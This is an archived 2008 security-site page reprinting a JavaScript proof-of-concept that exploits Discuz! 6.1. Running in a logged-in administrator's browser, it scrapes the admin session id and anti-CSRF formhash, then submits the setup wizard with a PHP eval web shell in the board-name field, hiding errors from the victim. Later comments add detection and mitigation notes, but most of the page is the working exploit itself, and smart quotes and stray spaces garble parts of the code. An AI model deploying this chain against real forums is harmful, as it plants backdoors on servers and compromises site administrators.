
myhack58佚名MYHACK58:62200821244
HistoryNov 28, 2008 - 12:00 a.m.

Discuz! 6.1 xss2webshell Exploit-vulnerability warning-the black bar safety net

2008-11-2800:00:00
佚名
www.myhack58.com

/*
#############################################
Discuz! 6.1 xss2webshell[SODB-2008-10] Exploit
by 80vul-A
team: http://www.80vul.com
#############################################

Defensive reading of this proof-of-concept. The script is meant to run in
the browser of a user who is already logged in to the Discuz! admin panel
(the "xss" half of xss2webshell; the injection point itself is not shown
here). It chains three synchronous same-origin requests: read the admin
session id from admincp.php, read the anti-CSRF token ("formhash") from the
admin home page, then submit the setup-wizard form with a PHP tag inside a
settings field. Note that a formhash-style token only defends against
cross-site requests; once attacker script executes on the same origin the
token can simply be read back, so the token is not the control that fails
here. Detection and mitigation notes are placed at each request below.
*/
//Target url - the base URL of the forum under test; every request below is same-origin to it.
var siteurl=‘http://www.80vul.com/Discuz_6.1.0/’;

// Pick an XMLHttpRequest implementation: native where present, otherwise
// the IE ActiveX ProgIDs. The loop does not break on success and swallows
// constructor failures, so the last ProgID that constructs is the one used.
var request = false;
if(window. XMLHttpRequest) {
request = new XMLHttpRequest();
if(request. overrideMimeType) {
request. overrideMimeType(‘text/xml’);
}
} else if(window. ActiveXObject) {
var versions = [‘Microsoft. XMLHTTP’, ‘MSXML. XMLHTTP’, ‘Microsoft. XMLHTTP’, ‘Msxml2. XMLHTTP. 7. 0’,‘Msxml2. XMLHTTP. 6. 0’,‘Msxml2. XMLHTTP. 5. 0’, ‘Msxml2. XMLHTTP. 4. 0’, ‘MSXML2. XMLHTTP. 3. 0’, ‘MSXML2. XMLHTTP’];
for(var i=0; i<versions. length; i++) {
try {
request = new ActiveXObject(versions[i]);
} catch(e) {}
}
}
// Assigned without var: an implicit global, i.e. the script relies on sloppy mode.
xmlhttp=request;

//Get the sid
// Step 1: a synchronous GET to the admin panel frameset. The victim's
// session cookie is attached automatically, which is what makes this a
// same-origin (XSS-driven) attack rather than a cross-site one.
xmlhttp. open(“GET”, siteurl+“admincp. php? frames=yes”, false);
//firefox3 can't use xmlhttp.send() with no argument; http://hi.baidu.com/aullik5/blog/item/fd0648fa4ef44762034f564e.html
//thx [email protected]
xmlhttp. send(null);
var echo = xmlhttp. responseText;
// The admin session id is scraped from a link in the returned HTML.
var reg = /action=home&sid=([\w\d]+)" /i;
var arr=reg. exec(echo);
if(! arr){
//Not logged in to the admin panel (no sid in the response).
// The script does not stop here: `sid` stays undefined and the next
// request goes out as `action=home&sid=undefined`, a distinctive
// artifact in access logs when a non-admin user is hit by the injection.
//alert(document. cookie);
}else{
var sid=arr[1];
}

//Get the formhash
// Step 2: fetch the admin home page and scrape the anti-CSRF token from its form.
xmlhttp. open(“GET”, siteurl+“admincp. php? action=home&sid=”+sid, false);
xmlhttp. send(null);
var echo = xmlhttp. responseText;
var reg = / name="formhash" value="([\w\d]+)"/i;
var arr=reg. exec(echo);
// Returning true from window.onerror suppresses the browser's default
// error reporting, so a failure on the next line (arr is null when no
// formhash was found) stays invisible to the victim.
window. onerror=function(){return true;}
var formhash=arr[1];
//alert(formhash);

//By the SODB-2008-10 write webshell
//http://www.80vul.com/dzvul/sodb/10/sodb-2008-10.txt
// Step 3: submit the setup wizard (step 3) with the scraped token. The
// settingsnew[bbname] value URL-decodes to a PHP code tag that evals a POST
// parameter; presumably the wizard serializes these settings into a PHP
// config file, which is what turns a settings value into executable code -
// confirm against the referenced advisory text. The step2submit value is
// the GBK-encoded label of the wizard's submit button; the "& amp;" in the
// body looks like an HTML-escaping artifact of this page's extraction
// rather than part of the original script.
// Detection: a POST to admincp.php?action=runwizard&step=3 whose
// settingsnew[...] fields contain "<?" or "eval(", preceded within seconds
// by GETs for frames=yes and action=home from the same session; and any
// change to the forum's generated config file that introduces eval.
// Mitigation: apply the vendor fix referenced above; settings that are
// written into executable files must be validated/escaped on the write
// path, independently of any CSRF token. Browsers generally refuse to let
// script set Referer (it is a forbidden request header), so the server
// cannot tell from this header alone whether the request was scripted.
xmlhttp. open(“POST”, siteurl+“admincp. php? action=runwizard&step=3”, false);
xmlhttp. setRequestHeader(“Referer”, siteurl);
xmlhttp. setRequestHeader(“Content-Type”,“application/x-www-form-urlencoded”);
xmlhttp. send(unescape(“settingsnew%5Bbbname%5D=%3C%3F@eval($_POST[cmd])%3A%3F%3E&settingsnew%5Bsitename%5D=Comsenz+Inc.& amp;settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww. comsenz. com%2F&step2submit=+%CF%C2%D2%BB%B2%BD+&formhash=”+formhash));